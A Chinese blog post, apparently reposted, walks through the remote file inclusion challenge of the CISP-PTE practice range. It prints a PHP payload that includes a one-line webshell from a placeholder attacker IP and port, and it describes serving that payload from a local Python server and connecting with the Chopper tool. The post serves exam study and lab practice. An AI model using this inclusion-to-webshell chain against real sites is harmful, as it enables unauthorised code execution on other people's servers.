cisp-pte靶场通关思路分享----远程文件包含篇

Posted 每天进步一点点

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了cisp-pte靶场通关思路分享----远程文件包含篇相关的知识,希望对你有一定的参考价值。

远程文件包含虽然没有弄到靶场,但是备考学习的时候不能不重视,毕竟谁也不知道,即将面临的考试碰到的是什么样的题型。可以参考下网上公开分享的资料。

题目是这样的:

不管啥url后面都给你加了个.txt,想到应该是用远程文件包含做

 

 

 

 

这里需要用到的知识就是利用python可以轻易在本地开一个服务器:如果有不知道怎么开的可以参考下面这里   

 点击这里

在服务器所在的目录下写一个shell.txt,内容如下

<?php echo(“hi”); Include(“http://<攻击机ip>:<攻击机开的端口>/wen.php”); echo(“bye”); ?>,其中wen.php为一个一句话木马。

 

 

 

 

 

 

访问:page=http://<攻击机ip>:<攻击机开的端口>/shell,即可看到shell.txt已经被php解析了,用菜刀链接即可获得key。

 

以上是关于cisp-pte靶场通关思路分享----远程文件包含篇的主要内容,如果未能解决你的问题,请参考以下文章

DVWA靶场之Brute Force(暴破)通关

网络安全文件上传靶场通关(1-11关)

Upload-Labs靶场 1-21全通关教程

web安全基础-文件上传(含部分upload-labs靶场通关)

网络安全文件上传靶场通关(1-11关)

vulntarget-b靶场详细通关记录